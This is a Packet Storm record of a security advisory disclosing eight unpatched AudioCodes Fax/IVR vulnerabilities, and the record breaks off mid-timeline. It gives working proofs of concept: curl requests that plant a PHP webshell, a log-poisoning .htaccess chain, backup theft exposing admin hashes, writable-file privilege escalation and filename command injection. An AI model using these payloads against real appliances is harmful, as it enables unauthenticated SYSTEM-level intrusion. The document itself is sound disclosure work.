{“lastseen”:”2025-11-20T17:14:05″,”description”:”AudioCodes Fax\/IVR…”,”published”:”2025-11-20T00:00:00″,”modified”:”2025-11-20T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 AudioCodes Fax\/IVR Appliance 2.6.23 File Upload \/ Code Execution \/ Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:211819″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2014-9222″,”CVE-2025-34328″,”CVE-2025-34329″,”CVE-2025-34330″,”CVE-2025-34331″,”CVE-2025-34332″,”CVE-2025-34333″,”CVE-2025-34334″,”CVE-2025-34335″],”sourceData”:”—–BEGIN PGP SIGNED MESSAGE—–\\n Hash: SHA512\\n \\n ## Advisory Information\\n \\n Title: 8 vulnerabilities in AudioCodes Fax\/IVR Appliance\\n Advisory URL: https:\/\/pierrekim.github.io\/advisories\/2025-audiocodes-fax-ivr.txt\\n Blog URL: https:\/\/pierrekim.github.io\/blog\/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html\\n Date published: 2025-11-20\\n Vendors contacted: Audiocodes\\n Release mode: Released\\n CVE: CVE-2025-34328, CVE-2025-34329, CVE-2025-34330, CVE-2025-34331, CVE-2025-34332, CVE-2025-34333, CVE-2025-34334, CVE-2025-34335\\n \\n \\n \\n ## Product description\\n \\n \\u003e AudioCodes’ Fax Server (Fax to Mail and Mail to Fax) application is a powerful and flexible software\\n \\u003e application used to manage inbound fax calls and outbound mail-to-fax calls, delivering them\\n \\u003e efficiently to their correct destination.\\n \\u003e \\n \\u003e From https:\/\/www.audiocodes.com\/media\/14442\/fax-server-and-auto-attendant-ivr-administrators-guide-ver-26x.pdf\\n \\n \\n \\n ## Vulnerabilities Summary\\n \\n Vulnerable versions: all versions.\\n \\n The summary of the vulnerabilities is:\\n \\n 1. CVE-2025-34328 – Pre-authenticated Remote Code Execution #1\\n 2. CVE-2025-34329 – Pre-authenticated Remote Code Execution #2\\n 3. CVE-2025-34330 – Pre-authenticated File upload vulnerability\\n 4. CVE-2025-34331 – Pre-authenticated File read\\n 5. CVE-2025-34332 – Local Privilege Escalation #1\\n 6. CVE-2025-34333 – Local Privilege Escalation #2\\n 7. CVE-2025-34334 – Post-authenticated Command Injection and Local Privilege Escalation\\n 8. CVE-2025-34335 – Post-authenticated Command Injection\\n \\n \\n _Miscellaneous notes_:\\n \\n The critical vulnerabilities have been confirmed to be present in the latest public version.\\n \\n Other vulnerabilities I have also identified require authentication, therefore the security risk is considered low to medium:\\n \\n – – An attacker with admin privileges in the web interface can execute commands as `NT AUTHORITY\\\\SYSTEM` in several ways;\\n – – An attacker with a local account on the server will very quickly gain `NT AUTHORITY\\\\SYSTEM` privileges, as file and directory permissions are insecure everywhere.\\n \\n Vulnerabilities #1, #2 #3 and #4 were shared with Audiocodes PSIRT but communication was almost nonexistent (see Report Timeline): AudioCodes PSIRT never provided any information or feedback, even with my regular follow-up emails. I also believe that this solution is EOL since December 31, 2024.\\n \\n Vulnerabilities #5, #7 and #8 were discovered during an audit of an \\”unsupported\\” version of the AudioCodes Fax\/IVR Appliance that was incorrectly patched. New unsupported versions were found in the vendor AWS S3 bucket that allows directory listing (https:\/\/downloads-audiocodes.s3.eu-central-1.amazonaws.com\/) – this bucket is used by the vendor to distribute some of its solutions. Surprisingly, the root causes were not addressed and the vulnerabilities #1 through #4 were still present. Vulnerability #6 was simply discovered during the creation of this security advisory to illustrate insecure permissions.\\n \\n I didn’t spend much time analyzing this solution (installation took 10 minutes and the first pre-auth RCE was found in about 5 minutes), but the existing PHP code presents a considerable attack surface.\\n \\n Regarding the security status of this product, it is also quite surprising to find no public CVEs. I assume this solution has never been audited.\\n \\n Unfortunately, the vendor has not followed their official security vulnerability handling. AudioCode’s PSIRT team has not responded, and security advisories have not been published.\\n \\n Additionally, It is also worth noting that Audiocodes Session Border Controllers (SBCs) were quietly patched in 2024 to address the misfortune cookie vulnerability (CVE-2014-9222). This exploit was tested on the Median Virtual Edition and Mediant 800 SBCs.\\n \\n kali% curl -kv –header ‘Cookie: C1012213=1′ https:\/\/\/192.168.0.2\/\\n -\\u003e \/acBin\/TPApp will segfault in the remote appliance\/ARM device\\n \\n – – firmware sbc-F7.40A.005.619 is vulnerable.\\n – – firmware sbc-F7.40A.500.781 is not vulnerable.\\n \\n No security bulletins were found regarding this silently patched vulnerability and it is recommended to use the latest firmware version of Audiocodes Session Border Controllers.\\n \\n _Impacts_\\n \\n An attacker can compromise AudioCodes Fax\/IVR Appliance without authentication and move laterally in the telecom and IT infrastructure.\\n \\n An attacker can compromise outdated AudioCodes Session Border Controllers with the misfortune cookie vulnerability.\\n \\n _Recommendations_\\n \\n Do not use AudioCodes Fax\/IVR Appliance.\\n \\n Do not expose the AudioCodes Fax\/IVR Appliance to the network.\\n \\n Use secure permissions.\\n \\n Remove vulnerable webpages.\\n \\n Update Audiocodes Session Border Controllers.\\n \\n \\n \\n ## Identification of the solution\\n \\n The latest solution (AudioCodes Fax\/IVR Appliance Installer, Version 2.6.230.000) can be found at:\\n \\n – – https:\/\/downloads-audiocodes.s3.eu-central-1.amazonaws.com\/Download\/AC_FAX_IVR_IW.html\\n – – https:\/\/downloads-audiocodes.s3.eu-central-1.amazonaws.com\/Fax_IVR\/FaxAtt_Setup_2.6.230.000.zip\\n \\n [please use the HTML version at https:\/\/pierrekim.github.io\/blog\/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html]\\n \\n \\n \\n ## Details – Pre-authenticated Remote Code Execution #1\\n \\n The vulnerability is located in the `C:\\\\F2MAdmin\\\\F2E\\\\AudioCodes_files\\\\utils\\\\IVR\\\\diagram\\\\ajaxScript.php` PHP file. This file allows an attacker to upload files without authentication.\\n \\n Content of `C:\\\\F2MAdmin\\\\F2E\\\\AudioCodes_files\\\\utils\\\\IVR\\\\diagram\\\\ajaxScript.php`:\\n \\n [code:php]\\n 1 \\u003c?php\\n 2 $dir = dirname(dirname(__FILE__));\\n 3 require_once $dir.’\/classes\/SystemStatus.class.php’;\\n 4 \\n 5 \/\/$scriptName = $_REQUEST[‘scriptName’];\\n 6 $action = isset($_REQUEST[\\”action\\”]) ? $_REQUEST[\\”action\\”] : \\”\\”;\\n 7 \\n 8 if(!empty($action)){\\n 9 if($action == ‘getScripts’){\\n […]\\n 26 }\\n 27 else if($action == ‘saveScript’){\\n 28 $scriptValue = $_POST[‘value’]; \/\/ [1] – attacker-controlled value\\n 29 $scriptName = $_POST[‘name’]; \/\/ [2] – attacker-controlled value\\n 30 \\n 31 $systemStatus = new SystemStatus();\\n 32 $sysInfo = $systemStatus-\\u003eGetSysInfo();\\n 33 $path = $sysInfo[SystemStatus::SCRIPTS_DIR];\\n 34 \\n 35 $ok = ‘false’;\\n 36 $ok = file_put_contents($path.\\”\/\\”.$scriptName, $scriptValue); \/\/ [3] – insecure file write with attacker-controlled values\\n 37 if($ok === true){\\n 38 $ok = ‘true’;\\n 39 }\\n 40 ob_clean();\\n 41 echo ($ok);\\n 42 die;\\n 43 }\\n 44 }\\n [\/code]\\n \\n As shown in the source code, there is no authentication.\\n \\n Without authentication, a remote attacker can access line 36 to write any file under `NT AUTHORITY\\\\system` (Apache runs as `NT AUTHORITY\\\\system`) because all the arguments for the `file_put_contents()` function are under attacker’s control.\\n \\n A PoC is provided below. A webshell is uploaded and a command is executed:\\n \\n kali% curl -kv \\”http:\/\/10.105.0.239:8090\/AudioCodes_files\/utils\/IVR\/diagram\/ajaxScript.php?action=saveScript\\” -d \\”name=F2MAdmin\/F2E\/webshell4.php\\u0026value=\\u003c?php system(\\\\$_GET[‘c’]);?\\u003e\\”\\n * Trying 10.105.0.239:8090…\\n * Connected to 10.105.0.239 (10.105.0.239) port 8090\\n * using HTTP\/1.x\\n \\u003e POST \/AudioCodes_files\/utils\/IVR\/diagram\/ajaxScript.php?action=saveScript HTTP\/1.1\\n \\u003e Host: 10.105.0.239:8090\\n \\u003e User-Agent: curl\/8.13.0\\n \\u003e Accept: *\/*\\n \\u003e Content-Length: 65\\n \\u003e Content-Type: application\/x-www-form-urlencoded\\n \\u003e \\n * upload completely sent off: 65 bytes\\n \\u003c HTTP\/1.1 200 OK\\n \\u003c Date: Mon, 26 May 2025 14:44:38 GMT\\n \\u003c Server: Apache\/2.4.62 (Win32) OpenSSL\/3.1.7 PHP\/8.1.31\\n \\u003c X-Powered-By: PHP\/8.1.31\\n \\u003c Set-Cookie: PHPSESSID=301ccae912e0c2aee878361e74d5bb30; path=\/\\n \\u003c Expires: Thu, 19 Nov 1981 08:52:00 GMT\\n \\u003c Cache-Control: no-store, no-cache, must-revalidate\\n \\u003c Pragma: no-cache\\n \\u003c Content-Length: 2\\n \\u003c Content-Type: text\/html; charset=UTF-8\\n \\u003c \\n * Connection #0 to host 10.105.0.239 left intact\\n %\\n kali% curl \\”http:\/\/10.105.0.239:8090\/webshell4.php?c=whoami\\”\\n nt authority\\\\system\\n kali% \\n \\n The resulting commands will be executed as `NT AUTHORITY\\\\system` (meaning full control of the remote server without authentication).\\n \\n If the `SystemStatus::SCRIPTS_DIR` variable (used for the `$path` variable in line 33) is set to a specific directory, the attacker can simply specify `name=\/..\/..\/..\/..\/..\/..\/..\/F2MAdmin\/F2E\/webshell4.php` as a path traversal in the HTTP request to traverse the directory and write the webshell in the `C:\\\\F2MAdmin\\\\F2E\\\\` directory (corresponding to the `DocumentRoot` directory).\\n \\n \\n \\n ## Details – Pre-authenticated Remote Code Execution #2\\n \\n The `C:\\\\F2MAdmin\\\\F2E\\\\AudioCodes_files\\\\ajaxBackupUploadFile.php` PHP script does not implement authentication, allowing any remote attacker to upload any file and overwrite any backup file in the default backup folder (default is `C:\\\\`).\\n \\n Content of `C:\\\\F2MAdmin\\\\F2E\\\\AudioCodes_files\\\\ajaxBackupUploadFile.php`:\\n \\n [code:php]\\n 1 \\u003c?php\\n 2 require_once ‘utils\/IVR\/classes\/IvrBackup.class.php’;\\n 3 require_once ‘utils\/IVR\/IvrRestUtil.php’;\\n 4 require_once ‘utils\/IVR\/diagram\/constants.php’;\\n 5 \\n 6 $ivrBackup_ins = new IvrBackups();\\n 7 $target_path = $ivrBackup_ins-\\u003eGetBackupFolderPath().\\”\\\\\\\\\\”;\\n 8 \\n 9 \\n 10 \/\/$target_path = \\”C:\\\\\\\\F2MAdmin\\\\\\\\tmp\\\\\\\\\\”;\\n 11 \\n 12 if(!is_dir($target_path))\\n 13 mkdir($target_path, 0777, true);\\n 14 \/* Add the original filename to our target path. \\n 15 Result is \\”uploads\/filename.extension\\” *\/\\n 16 $target_path = $target_path . basename( $_FILES[‘fileToUpload’][‘name’]);\\n 17 if(move_uploaded_file($_FILES[‘fileToUpload’][‘tmp_name’], $target_path)) {\\n 18 echo \\”The file \\”. basename( $_FILES[‘fileToUpload’][‘name’]).\\n 19 \\” has been uploaded.\\”;\\n 20 } else{\\n 21 echo \\”There was an error uploading the file, please try again!\\”;\\n 22 }\\n 23 die;\\n [\/code]\\n \\n Exploitation is explained below:\\n \\n 1. With `\/AudioCodes_files\/ajaxBackupUploadFile.php`, upload of a `.htaccess` file in `C:\\\\` containing this line:\\n \\n “`\\n php_value auto_prepend_file C:\/Apache24\/logs\/access.log\\n “`\\n \\n You can also skip step 2 and directly include a base64-encoded PHP webshell inside the `.htaccess` file with `auto_prepend_file = \\”data:;base64,BASE64(webshell)\\”` but it will probably be detected and blocked by any EDR.\\n \\n 2. Apache logs will be used to store a PHP webshell by requesting `\/OUTPUT:\\u003c?php system($_GET[‘c’]);?\\u003e` (this is an invalid HTTP request as we do not want to URL-encode the space into `%20`). The `OUTPUT` keyword is used to filter the interesting part of the resulting webpages in step 3 since the answer will also contain some HTML tags and JavaScript code.\\n \\n 3. Getting Remote Code Execution by reaching any PHP page because the `C:\\\\Apache24\\\\logs\\\\access.log` file will now be appended and it contains a PHP webshell.\\n \\n PoC:\\n \\n kali% curl -F \\”fileToUpload=php_value auto_prepend_file C:\/Apache24\/logs\/access.log;filename=.htaccess\\” http:\/\/10.105.0.239:8090\/AudioCodes_files\/ajaxBackupUploadFile.php\\n The file .htaccess has been uploaded.\\n \\n kali% echo \\”OUTPUT:\\u003c?php system(\\\\$_GET[‘c’]);?\\u003e\\” | nc -v 10.105.0.239 8090\\n 10.105.0.239: inverse host lookup failed: Unknown host\\n (UNKNOWN) [10.105.0.239] 8090 (?) open\\n HTTP\/1.1 400 Bad Request\\n Date: 26 May 2025 14:54:31 GMT\\n Server: Apache\/2.4.62 (Win32) OpenSSL\/3.1.7 PHP\/8.1.31\\n Content-Length: 226\\n Connection: close\\n Content-Type: text\/html; charset=iso-8859-1\\n \\n \\u003c!DOCTYPE HTML PUBLIC \\”-\/\/IETF\/\/DTD HTML 2.0\/\/EN\\”\\u003e\\n \\u003chtml\\u003e\\u003chead\\u003e\\n \\u003ctitle\\u003e400 Bad Request\\u003c\/title\\u003e\\n \\u003c\/head\\u003e\\u003cbody\\u003e\\n \\u003ch1\\u003eBad Request\\u003c\/h1\\u003e\\n \\u003cp\\u003eYour browser sent a request that this server could not understand.\\u003cbr \/\\u003e\\n \\u003c\/p\\u003e\\n \\u003c\/body\\u003e\\u003c\/html\\u003e\\n kali% \\n \\n kali% curl -s ‘http:\/\/10.105.0.239:8090\/?c=whoami’ | grep OUTPUT\\n 10.105.0.238 – – [26\/May\/2025:14:54:34 -0700] \\”OUTPUT:nt authority\\\\system\\n kali% curl -s ‘http:\/\/10.105.0.239:8090\/?c=dir’ | grep -A 10 OUTPUT\\n 10.105.0.238 – – [26\/May\/2025:14:54:39 -0700] \\”OUTPUT: Volume in drive C has no label.\\n Volume Serial Number is DECE-1ED7\\n \\n Directory of C:\\\\F2MAdmin\\\\F2E\\n \\n 05\/26\/2025 07:37 AM \\u003cDIR\\u003e .\\n 05\/26\/2025 07:37 AM \\u003cDIR\\u003e ..\\n 08\/22\/2023 12:37 PM 13,964 agent.php\\n 08\/22\/2023 12:37 PM 342 agentLogout.php\\n 08\/22\/2023 12:37 PM 27,611 AudioCodes.php\\n 05\/26\/2025 07:40 AM \\u003cDIR\\u003e AudioCodes_files\\n kali% \\n \\n \\n \\n ## Details – Pre-authenticated File upload vulnerability\\n \\n The `C:\\\\F2MAdmin\\\\F2E\\\\AudioCodes_files\\\\utils\\\\IVR\\\\diagram\\\\ajaxPromptUploadFile.php` PHP script does not implement authentication, allowing any remote attacker to upload any file in `C:\\\\F2MAdmin\\\\tmp`.\\n \\n PoC:\\n \\n kali% curl -F \\”fileToUpload=test;filename=test2.txt\\” http:\/\/10.105.0.239:8090\/AudioCodes_files\/utils\/IVR\/diagram\/ajaxPromptUploadFile.php\\n The file test2.txt has been uploaded\\n kali%\\n \\n The resulting file will be stored in `C:\\\\F2mAdmin\\\\tmp`.\\n \\n \\n \\n ## Details – Pre-authenticated File read\\n \\n The `C:\\\\F2MAdmin\\\\F2E\\\\AudioCodes_files\\\\download.php` PHP script does not implement authentication.\\n \\n This script allows to download files stored in the appliance depending on the authorized extensions (e.g., zip, txt, c2v, …).\\n \\n This vulnerability allows an attacker to download the backup files and compromise the server since they contain hashes of users.\\n \\n The format of the backup filename can be easily guessed (`BACKUP_Day_DD_Month_YY_HH_MM_SS.zip`).\\n \\n PoC:\\n \\n kali% curl ‘http:\/\/10.105.0.239:8090\/AudioCodes_files\/download.php?baseDir=C:\\\\F2MAdmin\\\\backup\\\\\\u0026f=BACKUP_Mon_26_May_25_20_23_42.zip’ –output BACKUP_Mon_26_May_25_20_23_42.zip\\n % Total % Received % Xferd Average Speed Time Time Time Current\\n Dload Upload Total Spent Left Speed\\n 100 3739 100 3739 0 0 139k 0 –:–:– –:–:– –:–:– 140k\\n kali% 7z l BACKUP_Mon_26_May_25_20_23_42.zip\\n \\n 7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29\\n 64-bit locale=en_US.UTF-8 Threads:8 OPEN_MAX:1024, ASM\\n \\n Scanning the drive for archives:\\n 1 file, 3739 bytes (4 KiB)\\n \\n Listing archive: BACKUP_Mon_26_May_25_20_23_42.zip\\n \\n –\\n Path = BACKUP_Mon_26_May_25_20_23_42.zip\\n Type = zip\\n Physical Size = 3739\\n \\n Date Time Attr Size Compressed Name\\n ——————- —– ———— ———— ————————\\n 2025-05-26 10:23:42 ….. 5120 402 dbcdr.db\\n 2025-05-26 10:23:44 ….. 455 154 ErrorLog.txt\\n 2025-05-26 10:23:42 ….. 73728 2484 f2e.db3\\n 2025-05-26 10:23:44 ….. 678 209 log.txt\\n 2025-05-26 10:23:44 ….. 2 2 ovoc.json\\n ——————- —– ———— ———— ————————\\n 2025-05-26 10:23:44 79983 3251 5 files\\n kali% unzip BACKUP_Mon_26_May_25_20_23_42.zip\\n Archive: BACKUP_Mon_26_May_25_20_23_42.zip\\n inflating: dbcdr.db \\n inflating: ErrorLog.txt \\n inflating: f2e.db3 \\n inflating: log.txt \\n extracting: ovoc.json \\n kali% sqlite3 f2e.db3\\n SQLite version 3.46.1 2024-08-13 09:16:08\\n Enter \\”.help\\” for usage hints.\\n sqlite\\u003e .dump\\n […]\\n INSERT INTO ADMIN VALUES(1,’Admin’,’e3afed0047b08059d0fada10f400c1e5′,NULL,NULL,0,1);\\n […]\\n \\n \\n \\n ## Details – Local Privilege Escalation #1\\n \\n Some batch files are executed as `NT AUTHORITY\\\\system` with the `system()` function. Unfortunately, these batch files can be overwritten by local users due to insecure permissions.\\n \\n Content of `C:\\\\F2E\\\\AudioCodes_files\\\\ajaxPost.php`:\\n \\n [code:php]\\n 1 \\u003c?php\\n […]\\n 132 $cmd = \\”cmd \/c \\”.\\”C:\\\\\\\\F2MAdmin\\\\\\\\F2E\\\\\\\\AudioCodes_files\\\\\\\\utils\\\\\\\\Services\\\\\\\\\\”;\\n 133 $stop = $cmd.\\”stop.bat\\”;\\n 134 $start = $cmd.\\”start.bat\\”;\\n 135 $restart = $cmd.\\”restart.bat\\”;\\n 136 if($serviceName == Services::FAX_SERVER_NAME || $serviceName == Services::FAX_ENGINE_NAME){\\n 137 if($action != Actions::START ){\\n 138 system($stop.’ \\”‘.Services::FAX_SERVER_NAME.’\\”‘);\\n 139 if($serviceName == Services::FAX_ENGINE_NAME)\\n 140 system($stop.’ \\”‘.Services::FAX_ENGINE_NAME.’\\”‘);\\n 141 }\\n 142 if($action != Actions::STOP){\\n 143 system($start.’ \\”‘.Services::FAX_ENGINE_NAME.’\\”‘); \/\/ start always\\n 144 system($start.’ \\”‘.Services::FAX_SERVER_NAME.’\\”‘);\\n [\/code]\\n \\n These files can be modified by any user on the server, allowing them to obtain `NT AUTHORITY\\\\SYSTEM` privileges:\\n \\n [please use the HTML version at https:\/\/pierrekim.github.io\/blog\/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html]\\n \\n Using `icacls`:\\n \\n C:\\\\F2MAdmin\\\\F2E\\\\AudioCodes_files\\\\utils\\\\Services\\u003e icacls *\\n restart.bat BUILTIN\\\\Administrators:(I)(F)\\n NT AUTHORITY\\\\SYSTEM:(I)(F)\\n BUILTIN\\\\Users:(I)(RX)\\n NT AUTHORITY\\\\Authenticated Users:(I)(M)\\n \\n RestartBlade.bat BUILTIN\\\\Administrators:(I)(F)\\n NT AUTHORITY\\\\SYSTEM:(I)(F)\\n BUILTIN\\\\Users:(I)(RX)\\n NT AUTHORITY\\\\Authenticated Users:(I)(M)\\n \\n RestartEmail.bat BUILTIN\\\\Administrators:(I)(F)\\n NT AUTHORITY\\\\SYSTEM:(I)(F)\\n BUILTIN\\\\Users:(I)(RX)\\n NT AUTHORITY\\\\Authenticated Users:(I)(M)\\n \\n RestartFaxReceiver.bat BUILTIN\\\\Administrators:(I)(F)\\n NT AUTHORITY\\\\SYSTEM:(I)(F)\\n BUILTIN\\\\Users:(I)(RX)\\n NT AUTHORITY\\\\Authenticated Users:(I)(M)\\n \\n RestartService.bat BUILTIN\\\\Administrators:(I)(F)\\n NT AUTHORITY\\\\SYSTEM:(I)(F)\\n BUILTIN\\\\Users:(I)(RX)\\n NT AUTHORITY\\\\Authenticated Users:(I)(M)\\n \\n RestartWatchdog.bat BUILTIN\\\\Administrators:(I)(F)\\n NT AUTHORITY\\\\SYSTEM:(I)(F)\\n BUILTIN\\\\Users:(I)(RX)\\n NT AUTHORITY\\\\Authenticated Users:(I)(M)\\n \\n Service.class.php BUILTIN\\\\Administrators:(I)(F)\\n NT AUTHORITY\\\\SYSTEM:(I)(F)\\n BUILTIN\\\\Users:(I)(RX)\\n NT AUTHORITY\\\\Authenticated Users:(I)(M)\\n \\n ServicesKeys.class.php BUILTIN\\\\Administrators:(I)(F)\\n NT AUTHORITY\\\\SYSTEM:(I)(F)\\n BUILTIN\\\\Users:(I)(RX)\\n NT AUTHORITY\\\\Authenticated Users:(I)(M)\\n \\n start.bat BUILTIN\\\\Administrators:(I)(F)\\n NT AUTHORITY\\\\SYSTEM:(I)(F)\\n BUILTIN\\\\Users:(I)(RX)\\n NT AUTHORITY\\\\Authenticated Users:(I)(M)\\n \\n startCommetrex.bat BUILTIN\\\\Administrators:(I)(F)\\n NT AUTHORITY\\\\SYSTEM:(I)(F)\\n BUILTIN\\\\Users:(I)(RX)\\n NT AUTHORITY\\\\Authenticated Users:(I)(M)\\n \\n startService.bat BUILTIN\\\\Administrators:(I)(F)\\n NT AUTHORITY\\\\SYSTEM:(I)(F)\\n BUILTIN\\\\Users:(I)(RX)\\n NT AUTHORITY\\\\Authenticated Users:(I)(M)\\n \\n startService1.bat BUILTIN\\\\Administrators:(I)(F)\\n NT AUTHORITY\\\\SYSTEM:(I)(F)\\n BUILTIN\\\\Users:(I)(RX)\\n NT AUTHORITY\\\\Authenticated Users:(I)(M)\\n \\n startService2.bat BUILTIN\\\\Administrators:(I)(F)\\n NT AUTHORITY\\\\SYSTEM:(I)(F)\\n BUILTIN\\\\Users:(I)(RX)\\n NT AUTHORITY\\\\Authenticated Users:(I)(M)\\n \\n stop.bat BUILTIN\\\\Administrators:(I)(F)\\n NT AUTHORITY\\\\SYSTEM:(I)(F)\\n BUILTIN\\\\Users:(I)(RX)\\n NT AUTHORITY\\\\Authenticated Users:(I)(M)\\n \\n stopCommetrex.bat BUILTIN\\\\Administrators:(I)(F)\\n NT AUTHORITY\\\\SYSTEM:(I)(F)\\n BUILTIN\\\\Users:(I)(RX)\\n NT AUTHORITY\\\\Authenticated Users:(I)(M)\\n \\n stopService.bat BUILTIN\\\\Administrators:(I)(F)\\n NT AUTHORITY\\\\SYSTEM:(I)(F)\\n BUILTIN\\\\Users:(I)(RX)\\n NT AUTHORITY\\\\Authenticated Users:(I)(M)\\n \\n stopService1.bat BUILTIN\\\\Administrators:(I)(F)\\n NT AUTHORITY\\\\SYSTEM:(I)(F)\\n BUILTIN\\\\Users:(I)(RX)\\n NT AUTHORITY\\\\Authenticated Users:(I)(M)\\n \\n stopService2.bat BUILTIN\\\\Administrators:(I)(F)\\n NT AUTHORITY\\\\SYSTEM:(I)(F)\\n BUILTIN\\\\Users:(I)(RX)\\n NT AUTHORITY\\\\Authenticated Users:(I)(M)\\n \\n y.txt BUILTIN\\\\Administrators:(I)(F)\\n NT AUTHORITY\\\\SYSTEM:(I)(F)\\n BUILTIN\\\\Users:(I)(RX)\\n NT AUTHORITY\\\\Authenticated Users:(I)(M)\\n \\n Successfully processed 19 files; Failed processing 0 files\\n \\n \\n \\n ## Details – Local Privilege Escalation #2\\n \\n The `DocumentRoot` directory `C:\\\\F2MAdmin\\\\F2E` can be modified by any user due to insecure permissions.\\n \\n PoC – a webshell will be executed as `NT AUTHORITY\\\\SYSTEM`: \\n \\n Microsoft Windows [Version 10.0.19043.928]\\n (c) Microsoft Corporation. All rights reserved.\\n \\n C:\\\\Users\\\\testuser\\u003ewhoami\\n desktop-to41lr8\\\\testuser\\n \\n C:\\\\Users\\\\testuser\\u003eicacls C:\\\\F2MAdmin\\\\F2E\\n C:\\\\F2MAdmin\\\\F2E BUILTIN\\\\Administrators:(I)(OI)(CI)(F)\\n NT AUTHORITY\\\\SYSTEM:(I)(OI)(CI)(F)\\n BUILTIN\\\\Users:(I)(OI)(CI)(RX)\\n NT AUTHORITY\\\\Authenticated Users:(I)(M)\\n NT AUTHORITY\\\\Authenticated Users:(I)(OI)(CI)(IO)(M)\\n \\n Successfully processed 1 files; Failed processing 0 files\\n \\n C:\\\\Users\\\\testuser\\u003eecho \\”\\u003c?php system(‘whoami’);?\\u003e\\” \\u003e C:\\\\F2MAdmin\\\\F2E\\\\a.php\\n \\n C:\\\\Users\\\\testuser\\u003ecurl http:\/\/127.0.0.1:8090\/a.php\\n \\”nt authority\\\\system\\n \\”\\n \\n C:\\\\Users\\\\testuser\\u003e\\n \\n I haven’t performed a comprehensive analysis, but additional Local Privilege Escalation vulnerabilities likely exist.\\n \\n \\n \\n ## Details – Post-authenticated Command Injection and Local Privilege Escalation\\n \\n In order to test the Fax configurattion, a batch file with attacker-controlled value will be created and then executed. Variables are not sanitized and can be used to execute additional malicious commands.\\n \\n Content of `C:\\\\F2E\\\\AudioCodes_files\\\\TestFax.php`:\\n \\n [code:php]\\n 1 \\u003c?php\\n […]\\n 10 $FromNumber = isset($_REQUEST[\\”FromNumber\\”]) ? trim($_REQUEST[\\”FromNumber\\”]) : ”;\\n 11 $ToNumber = isset($_REQUEST[\\”ToNumber\\”]) ? trim($_REQUEST[\\”ToNumber\\”]) : ”;\\n 12 $src_ip = isset($_REQUEST[\\”src_ip\\”]) ? trim($_REQUEST[\\”src_ip\\”]) : ”;\\n 13 $action = isset($_REQUEST[\\”action\\”]) ? trim($_REQUEST[\\”action\\”]) : ”;\\n […]\\n 32 if(strcmp($action,\\”send\\”)==0)\\n 33 {\\n 34 require_once ‘utils\/Global\/GlobalUtils.class.php’;\\n 35\\n 36 $command = \\”C:\\\\\\\\progra~2\\\\\\\\Commetrex\\\\\\\\otf\\\\\\\\bin\\\\\\\\faxsender -u sip:$ToNumber@$src_ip -f test_web_fax.tif -o mulaw -a T38 -c sip:$FromNumber@$src_ip -t\\”;\\n 37 GlobalUtils::RunBatchFile($command);\\n [\/code]\\n \\n The batch file containing the command will be written inside the `C:\\\\F2MAdmin\\\\run` directory and then executed by accessing a network service without authentication:\\n \\n `http:\/\/localhost:9437\/f2mw-service-api\/?method=runBatch\\u0026fileName=tmp_1754486471_37.bat`\\n \\n An authenticated attacker can use variables containing malicious commands with `\\u0026` or newline characters – the additional commands will be executed as `NT AUTHORITY\\\\system`.\\n \\n A local user can simply edit these files to inject malicious commands due to insecure permissions.\\n \\n \\n \\n ## Details – Post-authenticated Command Injection\\n \\n The `C:\\\\F2MAdmin\\\\F2E\\\\AudioCodes_files\\\\ActivateLicense.php` PHP script allows to upload a license file.\\n \\n When a license file containing a specific malicious extension is uploaded, this extension will be included in a command executed as `NT AUTHORITY\\\\system`. There is no sanitization, so an attacker can upload `test.ext\\u0026command_to_execute` to execute `command_to_execute` as `NT AUTHORITY\\\\system`:\\n \\n The execution flow is:\\n \\n $original_file (under the attacker’s control, this is the name of the uploaded file) -\\u003e $ext -\\u003e $newfile -\\u003e $target_path -\\u003e $params and then exec($params).\\n \\n Content of `C:\\\\F2MAdmin\\\\F2E\\\\AudioCodes_files\\\\ActivateLicense.php`:\\n \\n [code:php]\\n 1 \\u003c?php\\n 104 $c2vdir = \\”C:\/temp\/\\”;\\n […]\\n 242 $utime=time();\\n 243 \\n 244 $uday= date(‘d’);\\n 245 $umonth= date(‘m’);\\n 246 $uyear= date(‘y’);\\n 247 \\n 248 $udate=$umonth.$uday.$uyear;\\n 249 \\n 250 $filename=\\”a\\”.$udate.$utime;\\n 251 \\n 252 \\n 253 $target_path = $c2vdir; \\n […]\\n 257 $original_file = basename($_FILES[‘uploadedfile’][‘name’]);\\n 258 \\n 259 $pos = strpos($original_file,\\”.\\”,0);\\n 260 $ext = trim(substr($original_file,$pos+1,strlen($original_file)),\\” \\”);\\n 261 \\n 262 $newfile = $filename . \\”.\\” . $ext;\\n 263 \\n 264 $target_path = $target_path . basename($newfile);\\n […]\\n 269 $params = \\”–active -i \\”.$target_path;\\n 270 $res = exec (\\”C:\\\\\\\\F2MAdmin\\\\\\\\F2E\\\\\\\\external\\\\\\\\fax_server_lic_cmdline.exe \\”.$params,$resArr);\\n [\/code]\\n \\n The generated filename is made of ‘a’, the MMDDYY values, the current Unix time and the extension.\\n \\n For example, if the filename used during the upload (`$_FILES[‘uploadedfile’][‘name’]`) is set to `test.php\\u0026dir`, the `$params` variable will be set to `–active -i C:\/temp\/a0917251758121909.php\\u0026dir`.\\n \\n `dir` will be executed as `NT AUTHORITY\\\\system` on line 270.\\n \\n \\n \\n ## Report Timeline\\n * May 26 – 27, 2025: Security assessment performed on the AudioCodes IVR\/FAX appliance.\\n * May 28, 2025: Analysis sent to the AudioCodes PSIRT (vulnerabilities #1 to #3).\\n * May 28, 2025: Analysis sent to the AudioCodes PSIRT (vulnerability #4).\\n * May 29, 2025: Follow-up email sent to AudioCodes PSIRT.\\n * May 29, 2025: AudioCodes PSIRT confirmed receipt of the analysis.\\n * Jun, 13 2025: Follow-up email sent to AudioCodes PSIRT.\\n * Jun, 13 2025: Out-of-office reply from the AudioCodes PSIRT.\\n * Jul, 1 2025: Follow-up email sent to AudioCodes PSIRT. Asked details about patches, security bulletins and CVEs.\\n * Jul 8, 2025: I learned that AudioCodes had released an unofficial version with security patches.\\n * Jul 8, 2025: Confirmed that vulnerabilities were still present and new vulnerabilities were found.\\n * Sep, 16 2025: Follow-up email sent to AudioCodes PSIRT. Asked details about patches, security bulletins and CVEs.\\n * Sep, 16 2025: AudioCodes PSIRT indicated that their answer was already communicated on June 25.\\n * Sep, 17 2025: 